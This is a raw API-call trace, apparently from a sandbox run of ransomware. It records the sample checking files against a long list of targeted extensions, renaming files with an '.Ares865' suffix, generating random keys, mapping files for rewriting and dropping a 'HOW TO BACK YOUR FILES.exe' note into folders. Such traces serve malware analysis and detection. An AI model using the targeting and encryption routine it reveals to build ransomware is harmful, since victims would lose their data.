lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0060.487] lstrlenW (lpString="ns2") returned 3 [0060.487] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0060.487] lstrlenW (lpString="ns3") returned 3 [0060.487] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0060.487] lstrlenW (lpString="ns4") returned 3 [0060.487] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0060.487] lstrlenW (lpString="nsf") returned 3 [0060.487] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0060.487] lstrlenW (lpString="nv") returned 2 [0060.487] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0060.487] lstrlenW (lpString="nv2") returned 3 [0060.487] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0060.487] lstrlenW (lpString="nwdb") returned 4 [0060.487] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0060.487] lstrlenW (lpString="nyf") returned 3 [0060.487] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0060.487] lstrlenW (lpString="odb") returned 3 [0060.487] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.487] lstrlenW (lpString="odb") returned 3 [0060.487] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.487] lstrlenW (lpString="oqy") returned 3 [0060.487] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0060.487] lstrlenW (lpString="ora") returned 3 [0060.487] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0060.487] lstrlenW (lpString="orx") returned 3 [0060.487] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0060.487] lstrlenW (lpString="owc") returned 3 [0060.487] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0060.487] lstrlenW (lpString="p96") returned 3 [0060.487] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0060.487] lstrlenW (lpString="p97") returned 3 [0060.487] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0060.487] lstrlenW (lpString="pan") returned 3 [0060.487] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0060.488] lstrlenW (lpString="pdb") returned 3 [0060.488] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0060.488] lstrlenW (lpString="pdm") returned 3 [0060.488] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0060.488] lstrlenW (lpString="pnz") returned 3 [0060.488] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0060.488] lstrlenW (lpString="qry") returned 3 [0060.488] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0060.488] lstrlenW (lpString="qvd") returned 3 [0060.488] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0060.488] lstrlenW (lpString="rbf") returned 3 [0060.488] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0060.488] lstrlenW (lpString="rctd") returned 4 [0060.488] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0060.488] lstrlenW (lpString="rod") returned 3 [0060.488] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0060.488] lstrlenW (lpString="rodx") returned 4 [0060.488] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0060.488] lstrlenW (lpString="rpd") returned 3 [0060.488] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0060.488] lstrlenW (lpString="rsd") returned 3 [0060.488] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0060.488] lstrlenW (lpString="sas7bdat") returned 8 [0060.488] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0060.488] lstrlenW (lpString="sbf") returned 3 [0060.488] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0060.488] lstrlenW (lpString="scx") returned 3 [0060.488] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0060.488] lstrlenW (lpString="sdb") returned 3 [0060.488] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0060.488] lstrlenW (lpString="sdc") returned 3 [0060.488] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0060.488] lstrlenW (lpString="sdf") returned 3 [0060.488] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0060.488] lstrlenW (lpString="sis") returned 3 [0060.488] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0060.488] lstrlenW (lpString="spq") returned 3 [0060.488] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0060.488] lstrlenW (lpString="te") returned 2 [0060.489] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0060.489] lstrlenW (lpString="teacher") returned 7 [0060.489] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0060.489] lstrlenW (lpString="tmd") returned 3 [0060.489] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0060.489] lstrlenW (lpString="tps") returned 3 [0060.489] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0060.489] lstrlenW (lpString="trc") returned 3 [0060.489] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.489] lstrlenW (lpString="trc") returned 3 [0060.489] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.489] lstrlenW (lpString="trm") returned 3 [0060.489] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0060.489] lstrlenW (lpString="udb") returned 3 [0060.489] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0060.489] lstrlenW (lpString="udl") returned 3 [0060.489] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0060.489] lstrlenW (lpString="usr") returned 3 [0060.489] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0060.489] lstrlenW (lpString="v12") returned 3 [0060.489] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0060.489] lstrlenW (lpString="vis") returned 3 [0060.489] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0060.489] lstrlenW (lpString="vpd") returned 3 [0060.489] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0060.489] lstrlenW (lpString="vvv") returned 3 [0060.489] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0060.489] lstrlenW (lpString="wdb") returned 3 [0060.489] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0060.489] lstrlenW (lpString="wmdb") returned 4 [0060.489] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0060.489] lstrlenW (lpString="wrk") returned 3 [0060.489] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0060.489] lstrlenW (lpString="xdb") returned 3 [0060.489] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0060.489] lstrlenW (lpString="xld") returned 3 [0060.489] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0060.489] lstrlenW (lpString="xmlff") returned 5 [0060.490] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0060.490] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini.Ares865") returned 102 [0060.490] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0060.490] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\rijuql1c\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.490] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0060.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0060.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0060.491] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0060.492] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.492] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.492] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x164 [0060.494] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0060.494] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0060.495] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0060.495] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0060.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0060.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.496] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0060.496] CloseHandle (hObject=0x164) returned 1 [0060.496] CloseHandle (hObject=0x15c) returned 1 [0060.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0060.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.496] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.496] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.496] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0060.496] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0060.496] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0060.496] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0060.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e27c0 | out: hHeap=0x2b0000) returned 1 [0060.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0060.496] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned 82 [0060.496] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0060.496] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.497] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.497] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.497] GetLastError () returned 0x0 [0060.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.497] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.497] CloseHandle (hObject=0x12c) returned 1 [0060.497] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.497] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.497] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0060.498] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.498] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.498] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.498] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.498] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.498] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.498] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.498] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.498] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e5e3095, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0060.498] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.498] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0060.498] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0060.498] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0060.498] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0060.498] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0060.498] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0060.498] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0060.498] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0060.498] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0060.498] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0060.498] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0060.498] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0060.498] lstrlenW (lpString="desktop.ini") returned 11 [0060.498] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*") returned 84 [0060.498] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0060.498] lstrlenW (lpString="desktop.ini") returned 11 [0060.498] lstrlenW (lpString="Ares865") returned 7 [0060.498] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0060.498] lstrlenW (lpString=".dll") returned 4 [0060.498] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0060.498] lstrlenW (lpString=".lnk") returned 4 [0060.498] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0060.498] lstrlenW (lpString=".ini") returned 4 [0060.499] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0060.499] lstrlenW (lpString=".sys") returned 4 [0060.499] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0060.499] lstrlenW (lpString="desktop.ini") returned 11 [0060.499] lstrlenW (lpString="bak") returned 3 [0060.499] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0060.499] lstrlenW (lpString="ba_") returned 3 [0060.499] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0060.499] lstrlenW (lpString="dbb") returned 3 [0060.499] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0060.499] lstrlenW (lpString="vmdk") returned 4 [0060.499] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0060.499] lstrlenW (lpString="rar") returned 3 [0060.499] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0060.499] lstrlenW (lpString="zip") returned 3 [0060.499] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0060.499] lstrlenW (lpString="tgz") returned 3 [0060.499] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0060.499] lstrlenW (lpString="vbox") returned 4 [0060.499] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0060.499] lstrlenW (lpString="vdi") returned 3 [0060.499] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0060.499] lstrlenW (lpString="vhd") returned 3 [0060.499] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0060.499] lstrlenW (lpString="vhdx") returned 4 [0060.499] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0060.499] lstrlenW (lpString="avhd") returned 4 [0060.499] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0060.499] lstrlenW (lpString="db") returned 2 [0060.499] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0060.499] lstrlenW (lpString="db2") returned 3 [0060.499] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0060.499] lstrlenW (lpString="db3") returned 3 [0060.499] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0060.499] lstrlenW (lpString="dbf") returned 3 [0060.499] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0060.499] lstrlenW (lpString="mdf") returned 3 [0060.499] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0060.500] lstrlenW (lpString="mdb") returned 3 [0060.500] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0060.500] lstrlenW (lpString="sql") returned 3 [0060.500] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0060.500] lstrlenW (lpString="sqlite") returned 6 [0060.500] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0060.500] lstrlenW (lpString="sqlite3") returned 7 [0060.500] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0060.500] lstrlenW (lpString="sqlitedb") returned 8 [0060.500] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0060.500] lstrlenW (lpString="xml") returned 3 [0060.500] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0060.500] lstrlenW (lpString="$er") returned 3 [0060.500] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0060.500] lstrlenW (lpString="4dd") returned 3 [0060.500] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0060.500] lstrlenW (lpString="4dl") returned 3 [0060.500] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0060.500] lstrlenW (lpString="^^^") returned 3 [0060.500] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0060.500] lstrlenW (lpString="abs") returned 3 [0060.500] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0060.500] lstrlenW (lpString="abx") returned 3 [0060.500] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0060.500] lstrlenW (lpString="accdb") returned 5 [0060.500] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0060.500] lstrlenW (lpString="accdc") returned 5 [0060.500] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0060.500] lstrlenW (lpString="accde") returned 5 [0060.500] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0060.500] lstrlenW (lpString="accdr") returned 5 [0060.500] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0060.500] lstrlenW (lpString="accdt") returned 5 [0060.500] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0060.500] lstrlenW (lpString="accdw") returned 5 [0060.500] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0060.500] lstrlenW (lpString="accft") returned 5 [0060.500] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0060.501] lstrlenW (lpString="adb") returned 3 [0060.501] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.501] lstrlenW (lpString="adb") returned 3 [0060.501] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.501] lstrlenW (lpString="ade") returned 3 [0060.501] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0060.501] lstrlenW (lpString="adf") returned 3 [0060.501] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0060.501] lstrlenW (lpString="adn") returned 3 [0060.501] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0060.501] lstrlenW (lpString="adp") returned 3 [0060.501] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0060.501] lstrlenW (lpString="alf") returned 3 [0060.501] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0060.501] lstrlenW (lpString="ask") returned 3 [0060.501] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0060.501] lstrlenW (lpString="btr") returned 3 [0060.501] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0060.501] lstrlenW (lpString="cat") returned 3 [0060.501] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0060.501] lstrlenW (lpString="cdb") returned 3 [0060.501] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0060.501] lstrlenW (lpString="ckp") returned 3 [0060.501] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0060.501] lstrlenW (lpString="cma") returned 3 [0060.501] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0060.501] lstrlenW (lpString="cpd") returned 3 [0060.501] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0060.501] lstrlenW (lpString="dacpac") returned 6 [0060.501] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0060.501] lstrlenW (lpString="dad") returned 3 [0060.501] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0060.501] lstrlenW (lpString="dadiagrams") returned 10 [0060.501] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0060.501] lstrlenW (lpString="daschema") returned 8 [0060.501] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0060.501] lstrlenW (lpString="db-journal") returned 10 [0060.501] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0060.502] lstrlenW (lpString="db-shm") returned 6 [0060.502] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0060.502] lstrlenW (lpString="db-wal") returned 6 [0060.502] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0060.502] lstrlenW (lpString="dbc") returned 3 [0060.502] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0060.502] lstrlenW (lpString="dbs") returned 3 [0060.502] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0060.502] lstrlenW (lpString="dbt") returned 3 [0060.502] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0060.502] lstrlenW (lpString="dbv") returned 3 [0060.502] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0060.502] lstrlenW (lpString="dbx") returned 3 [0060.502] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0060.502] lstrlenW (lpString="dcb") returned 3 [0060.502] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0060.502] lstrlenW (lpString="dct") returned 3 [0060.502] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0060.502] lstrlenW (lpString="dcx") returned 3 [0060.502] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0060.502] lstrlenW (lpString="ddl") returned 3 [0060.502] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0060.502] lstrlenW (lpString="dlis") returned 4 [0060.502] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0060.502] lstrlenW (lpString="dp1") returned 3 [0060.502] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0060.502] lstrlenW (lpString="dqy") returned 3 